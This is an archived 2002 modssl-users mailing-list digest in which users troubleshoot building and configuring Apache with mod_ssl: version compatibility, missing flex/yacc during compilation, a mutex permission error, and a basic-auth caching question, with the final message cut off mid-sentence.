Date: Thu, 11 Apr 2002 08:31:11 +0300 From: Eli Marmor Organization: Netmask (El-Mar) Internet Technologies X-Mailer: Mozilla 4.08 [Hebrew Support by elmar.co.il (X11; I; Linux 2.4.8-26mdk i686) MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: modssl for Apache 2.0 References: Content-Type: text/plain; charset=iso-8859-8 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eli Marmor X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users R. DuFresne wrote: > > When is apache 2.0 coming out of beta and into primetime? April 6, 2002. -- Eli Marmor marmor@netmask.it CTO, Founder Netmask (El-Mar) Internet Technologies Ltd. __________________________________________________________ Tel.: +972-9-766-1020 8 Yad-Harutzim St. Fax.: +972-9-766-1314 P.O.B. 7004 Mobile: +972-50-23-7338 Kfar-Saba 44641, Israel ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 09:31:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA17544; Thu, 11 Apr 2002 09:30:25 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA17482; Thu, 11 Apr 2002 09:29:17 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 3E86E4CE754; Thu, 11 Apr 2002 09:00:10 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3B58TT70829; Thu, 11 Apr 2002 07:08:29 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.cmpnet.com id RAA01880; Wed, 10 Apr 2002 17:21:25 +0200 (MET DST) From: jbuchana@cmpnet.com Received: from mail1.cmpnet.com (localhost [127.0.0.1]) by mail1.cmpnet.com (8.12.1/8.12.0) with ESMTP id g3AFLNfJ018821 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Wed, 10 Apr 2002 08:21:23 -0700 (PDT) Received: from localhost (jbuchana@localhost) by mail1.cmpnet.com (8.12.1/8.12.0/Submit) with ESMTP id g3AFLMUE018818 for ; Wed, 10 Apr 2002 08:21:23 -0700 (PDT) Date: Wed, 10 Apr 2002 08:21:22 -0700 (PDT) To: modssl-users@modssl.org Subject: apache 1.3.12 with newer mod_ssl In-Reply-To: <3CB43FED.F6E10F44@cru.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jbuchana@cmpnet.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users What are the issues with using a newer mod_ssl with an older apache? I need to use Apache 1.3.12 for a project and am wondering if I can use the newer mod_ssl releases? Are there bugs or vulnerabilities with the mod_ssl for Apache 1.3.12 or is it safe to use the older mod_ssl? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 09:55:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA19263; Thu, 11 Apr 2002 09:54:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from raq720.uk2net.com id JAA19230; Thu, 11 Apr 2002 09:53:13 +0200 (MET DST) Received: from lt (210.49.111.228.optusnet.com.au [210.49.111.228] (may be forged)) by raq720.uk2net.com (8.9.3/8.9.3) with SMTP id IAA04116 for ; Thu, 11 Apr 2002 08:57:58 +0100 Message-ID: <00e101c1e12d$c947fa40$0104000a@jumpstartpromotions.com> From: "Jeff" To: References: Subject: Re: apache 1.3.12 with newer mod_ssl Date: Thu, 11 Apr 2002 17:52:07 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeff" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users http://www.modssl.org/docs/2.8/ssl_faq.html#ToC5 quote: "And this also means you only can apply this mod_ssl version to exactly this Apache version " Regards Jeff ----- Original Message ----- From: To: Sent: Thursday, April 11, 2002 1:21 AM Subject: apache 1.3.12 with newer mod_ssl > > What are the issues with using a newer mod_ssl with an older apache? > > I need to use Apache 1.3.12 for a project and am wondering if I can use > the newer mod_ssl releases? Are there bugs or vulnerabilities with the > mod_ssl for Apache 1.3.12 or is it safe to use the older mod_ssl? > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 10:05:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA20050; Thu, 11 Apr 2002 10:04:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA19999; Thu, 11 Apr 2002 10:03:16 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id D824D4CE691; Thu, 11 Apr 2002 10:03:15 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3B78Z572603; Thu, 11 Apr 2002 09:08:35 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cypntx.ugsolutions.com id IAA14369; Thu, 11 Apr 2002 08:12:27 +0200 (MET DST) Received: from sihps.sdrc.com (sdrc.com [146.122.157.12]) by cypntx.ugsolutions.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id 2RXVVJ39; Wed, 10 Apr 2002 23:12:02 -0700 Received: from ugs.com (si044.sdrc.com [146.122.157.54]) by sihps.sdrc.com (8.11.3/8.11.6) with ESMTP id g3B6Gu110442 for ; Thu, 11 Apr 2002 11:46:59 +0530 (IST) Message-ID: <3CB526D2.557B9081@ugs.com> Date: Thu, 11 Apr 2002 11:31:54 +0530 From: gmiman X-Mailer: Mozilla 4.76 [en] (X11; U; HP-UX B.11.00 9000/782) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Problem with apache2.0 running Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: gmiman X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have compiled and installed successfully apache2.0 on HP-UX 11.0 machine. I am also able to start apache, but when I try to reach the default site using netwscape browser(i.e http://localhost_name ), i got the following apache error log. Thu Apr 11 11:26:51 2002] [emerg] (13)Permission denied: apr_proc_mutex_lock failed. Attempting to shutdown process gracefully. [Thu Apr 11 11:26:51 2002] [emerg] (13)Permission denied: apr_proc_mutex_unlock failed. Attempting to shutdown process gracefully. Can you please help me what it means and resolving it? Thanks & Regards, Vijaya Pal ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 10:20:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA21073; Thu, 11 Apr 2002 10:19:31 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA21031; Thu, 11 Apr 2002 10:18:34 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA01060 for ; Thu, 11 Apr 2002 10:18:25 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma001058; Thu, 11 Apr 02 10:18:16 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA06144 for ; Thu, 11 Apr 2002 10:18:15 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA21633 for ; Thu, 11 Apr 2002 10:18:14 +0200 (MEST) Message-ID: <3CB546C6.5CE86E76@bourse.ch> Date: Thu, 11 Apr 2002 10:18:14 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: apache 1.3.12 with newer mod_ssl References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users jbuchana@cmpnet.com wrote: > > What are the issues with using a newer mod_ssl with an older apache? > > I need to use Apache 1.3.12 for a project and am wondering if I can use > the newer mod_ssl releases? Are there bugs or vulnerabilities with the > mod_ssl for Apache 1.3.12 or is it safe to use the older mod_ssl? AFAIK, mod_ssl is tweaked with every new apache version. If you look on the mod_ssl site you will see that each distro is tagged with the apache version to which it applies. I would not expect mod_ssl-2.8.8-1.3.24 to work with apache 1.3.12. Why do you need to use 1.3.12? If your binary was not compiled with EAPI (needed for mod_ssl) you will need to recompile anyway. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 11:40:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA24567; Thu, 11 Apr 2002 11:39:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id LAA24555; Thu, 11 Apr 2002 11:38:58 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 2B4FA4CE749; Thu, 11 Apr 2002 11:38:58 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3B9cWI74991; Thu, 11 Apr 2002 11:38:32 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id LAA23450; Thu, 11 Apr 2002 11:08:26 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 11 Apr 2002 01:56:48 -0700 Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP; Thu, 11 Apr 2002 08:56:45 GMT X-Originating-IP: [134.32.101.94] From: "paul priestman" To: modssl-users@modssl.org Subject: Apache 2.0.35 and SSL Date: Thu, 11 Apr 2002 08:56:45 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 11 Apr 2002 08:56:48.0009 (UTC) FILETIME=[D02BA790:01C1E136] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "paul priestman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, I am trying to compile apache 2.0.35 with ssl but it is not working. My config is as follows: ./configure --prefix=/path/whereiwant/apache \ --enable-ssl \ --with-ssl=/path/to/openssl however on make i get the following error flex -Pssl_expr_yy -s -B /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl/ssl_expr_scan.l sh: flex: not found *** Error code 1 make: Fatal error: Command failed for target `ssl_expr_scan.c' Current working directory /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Current working directory /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl *** Error code 1 make: Fatal error: Command failed for target `all-recursive' Current working directory /home/user/jwoodman/apache/httpd-2.0.35/modules *** Error code 1 make: Fatal error: Command failed for target `all-recursive' I have managed to get apache 1.3.22 working with modssl and apache 2.0.35 working without ssl. Thanks for your help Regards _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 14:20:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA02740; Thu, 11 Apr 2002 14:19:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id OAA02729; Thu, 11 Apr 2002 14:18:52 +0200 (MET DST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 11 Apr 2002 05:18:45 -0700 X-Originating-IP: [210.49.252.9] From: "David" To: Subject: problem with SSL authentication Date: Thu, 11 Apr 2002 22:17:38 +1000 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0010_01C1E1A6.B09EC360" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Message-ID: X-OriginalArrivalTime: 11 Apr 2002 12:18:45.0914 (UTC) FILETIME=[070137A0:01C1E153] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0010_01C1E1A6.B09EC360 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable My website is a https website using mod_ssl : Apache/1.3.22 (Unix) (Red-Hat/Linux) mod_ssl/2.8.5 OpenSSL/0.9.6 = DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01 This is what i have in my access.conf : AuthName https://name.of.my.website/secure AuthType Basic AuthUserFile /path/to/password/file Require valid-user Here is the problem. When i click a link to a page in the directory, i = come up with my login screen popup. If i type the right = username/password pair, it will display the page, if i dont, it comes up = with a 403 error-forbidden. This is all fine. However, i was extremely = surprised to realise that if i fail the connection to receive the 403 = error, i can click the back button in the browser, then the forward = button, and get the page...even tho i still havent even authenticated = yet!!! I am assuming that I am doing something stupid, but i cant seem = to guess what that might be. Thanks in advance for any help! ------=_NextPart_000_0010_01C1E1A6.B09EC360 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
My website is a https website using = mod_ssl=20 :
Apache/1.3.22 (Unix) (Red-Hat/Linux) = mod_ssl/2.8.5=20 OpenSSL/0.9.6 DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01
 
This is what i have in my access.conf=20 :
 
<Directory=20 /path/to/directory/secure>
      &nbs= p;=20 AuthName       https://name.of.my.website/sec= ure
       =20 AuthType       =20 Basic
       =20 AuthUserFile    /path/to/password/file
        = Require=20 valid-user
</Directory>
 
Here is the problem.  When i click = a link to a=20 page in the directory, i come up with my login screen popup.  If i = type the=20 right username/password pair, it will display the page, if i dont, it = comes up=20 with a 403 error-forbidden.  This is all fine.  However, i was = extremely surprised to realise that if i fail the connection to receive = the 403=20 error, i can click the back button in the browser, then the forward = button, and=20 get the page...even tho i still havent even authenticated yet!!!  I = am=20 assuming that I am doing something stupid, but i cant seem to guess what = that=20 might be.
 
Thanks in advance for any = help!
 
------=_NextPart_000_0010_01C1E1A6.B09EC360-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 14:37:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA03379; Thu, 11 Apr 2002 14:36:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id OAA03348; Thu, 11 Apr 2002 14:35:21 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id OAA05572 for ; Thu, 11 Apr 2002 14:35:15 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma005570; Thu, 11 Apr 02 14:35:15 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id OAA13808 for ; Thu, 11 Apr 2002 14:35:14 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA12693 for ; Thu, 11 Apr 2002 14:35:13 +0200 (MEST) Message-ID: <3CB58301.8B6CCAF2@bourse.ch> Date: Thu, 11 Apr 2002 14:35:13 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: problem with SSL authentication References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > David wrote: > > My website is a https website using mod_ssl : > Apache/1.3.22 (Unix) (Red-Hat/Linux) mod_ssl/2.8.5 OpenSSL/0.9.6 > DAV/1.0.2 PHP/4.0.4pl1 mod_perl/1.24_01 > > This is what i have in my access.conf : > > > AuthName https://name.of.my.website/secure > AuthType Basic > AuthUserFile /path/to/password/file > Require valid-user > > > Here is the problem. When i click a link to a page in the directory, > i come up with my login screen popup. If i type the right > username/password pair, it will display the page, if i dont, it comes > up with a 403 error-forbidden. This is all fine. However, i was > extremely surprised to realise that if i fail the connection to > receive the 403 error, i can click the back button in the browser, > then the forward button, and get the page...even tho i still havent > even authenticated yet!!! I am assuming that I am doing something > stupid, but i cant seem to guess what that might be. Are you sure it does this on a first-time login with a clean browser, before you *ever* authenticate? Remember that if you login even once, your browser will cache the username/password and use it automatically for any subsequent requests in the protected realm (that is how you only have to authenticate once and can navigated about in a protected realm)> Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 15:47:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA06547; Thu, 11 Apr 2002 15:46:08 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id PAA06511; Thu, 11 Apr 2002 15:45:16 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA02220 for ; Thu, 11 Apr 2002 09:50:52 -0400 Date: Thu, 11 Apr 2002 09:50:52 -0400 (EDT) From: "R. DuFresne" To: modssl-users@modssl.org Subject: RE: modssl for Apache 2.0 In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Lookin at it now. So, are compile directives pretty much the same, as for pointing at the ssl source and mm source trees? The docs are not as clear on this as Ralf has them in the mod-ssl structures . Thanks, Ron DuFresne On Thu, 11 Apr 2002, Cliff Woolley wrote: > On Thu, 11 Apr 2002, R. DuFresne wrote: > > > When is apache 2.0 coming out of beta and into primetime? > > How did you manage to miss the party? :) It went GA last week with the > release of 2.0.35. > > --Cliff > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:05:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA07690; Thu, 11 Apr 2002 16:04:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from internet id QAA07645; Thu, 11 Apr 2002 16:03:10 +0200 (MET DST) Message-Id: <200204111403.QAA07645@opensource.ee.ethz.ch> Received: from there ([172.16.49.52]) by internet; Thu, 11 Apr 2002 15:00:40 +0100 Content-Type: text/plain; charset="iso-8859-15" From: Neil Marjoram Organization: Victoria and albert Museum To: modssl-users@modssl.org Subject: Apache 2.0 and mod_ssl compile problem. Date: Thu, 11 Apr 2002 15:00:40 +0100 X-Mailer: KMail [version 1.3.2] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Neil Marjoram X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have had a few problems when compiling Apache 2.0.35 with mod_ssl. My first error was no yacc - I found the line in the modules/ssl/Makefile and changed it for bison, I have tried options --fixed-outout-files and --yacc, but it seems the y.tab.h file is not produced. However I have also noted that the Makefile contains the line just before the yacc statement : # # developer stuff # (we really don't expect end users to use these targets!) # So I am wondering if these file are supposed to be there or not. Removing the y.tab.h file from the sed allows the compile to continue. Heres one of the outputs I have had : bison --yacc /usr/local/build/apache20/httpd-2.0.35/modules/ssl/ssl_expr_parse.y sed -e 's;yy;ssl_expr_yy;g' \ -e '/#if defined(c_plusplus) || defined(__cplusplus)/,/#endif/d' \ ssl_expr_parse.c && rm -f y.tab.c sed -e 's;yy;ssl_expr_yy;g' \ ssl_expr_parse.h && rm -f y.tab.h /bin/sh: y.tab.h: cannot open make[3]: *** [ssl_expr_parse.h] Error 1 make[3]: Leaving directory `/usr/local/build/apache20/httpd-2.0.35/modules/ssl' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/usr/local/build/apache20/httpd-2.0.35/modules/ssl' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/usr/local/build/apache20/httpd-2.0.35/modules' make: *** [all-recursive] Error 1 Can anyone shed light on this? Thanks for your help, Neil. -- Neil Marjoram. Unix System Manager, Victoria and Albert Museum, Cromwell Road, London. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:08:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA08270; Thu, 11 Apr 2002 16:07:17 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id QAA07843; Thu, 11 Apr 2002 16:06:02 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3BE4uY31907 for ; Thu, 11 Apr 2002 10:04:56 -0400 Date: Thu, 11 Apr 2002 10:04:56 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: apache 1.3.12 with newer mod_ssl In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 10 Apr 2002 jbuchana@cmpnet.com wrote: > What are the issues with using a newer mod_ssl with an older apache? First of all, it would be difficult to get the patches to apply without heavy manual assistance. > I need to use Apache 1.3.12 for a project and am wondering if I can use > the newer mod_ssl releases? Are there bugs or vulnerabilities with the > mod_ssl for Apache 1.3.12 or is it safe to use the older mod_ssl? Secondly, there are both bugs and (relatively minor) vulnerabilities in older versions of both mod_ssl and Apache. --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:12:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA08566; Thu, 11 Apr 2002 16:11:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id QAA08526; Thu, 11 Apr 2002 16:10:13 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3BE97X31911 for ; Thu, 11 Apr 2002 10:09:07 -0400 Date: Thu, 11 Apr 2002 10:09:07 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: lex and yacc was Re: Apache 2.0.35 and SSL In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 11 Apr 2002, paul priestman wrote: > flex -Pssl_expr_yy -s -B > /home/user/jwoodman/apache/httpd-2.0.35/modules/ssl/ssl_expr_scan.l > sh: flex: not found > *** Error code 1 I *wish* I could figure out why it is that mod_ssl feels the need to regenerate the scanner and parser sometimes. It happens to me every now and then but I haven't pinned down the cause. Best guess is that you did a copy of the files without preserving the timestamps? Anyway, we distribute the generated files... you already have them, you just need to update the timestamps on them so that you can convince make they're not out-of-date. Do this: cd httpd-2.0/modules/ssl touch ssl_expr_scan.c touch ssl_expr_parse.c touch ssl_expr_parse.h Then it should work fine. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:19:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA09039; Thu, 11 Apr 2002 16:18:43 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id QAA08996; Thu, 11 Apr 2002 16:17:42 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3BEGaA31915 for ; Thu, 11 Apr 2002 10:16:36 -0400 Date: Thu, 11 Apr 2002 10:16:36 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: RE: modssl for Apache 2.0 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 11 Apr 2002, R. DuFresne wrote: > Lookin at it now. So, are compile directives pretty much the same, as for > pointing at the ssl source and mm source trees? The docs are not as clear > on this as Ralf has them in the mod-ssl structures . Look at ./configure --help for starters. Hint --with-ssl=DIR is probably what you're looking for. Oh, and Apache 2.0's mod_ssl doesn't use mm anymore... it uses the shared memory support that's built in to APR. --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 11 16:19:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA09052; Thu, 11 Apr 2002 16:18:57 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id QAA09011; Thu, 11 Apr 2002 16:17:57 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 18DB1BD2A; Thu, 11 Apr 2002 16:18:07 +0200 (CEST) Date: Thu, 11 Apr 2002 16:18:07 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: lex and yacc was Re: Apache 2.0.35 and SSL Message-ID: <20020411141806.GI1051@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Apr 11, 2002 at 10:09:07AM -0400, Cliff Woolley wrote: > I *wish* I could figure out why it is that mod_ssl feels the need to > regenerate the scanner and parser sometimes. It happens to me every now > and then but I haven't pinned down the cause. Best guess is that you did > a copy of the files without preserving the 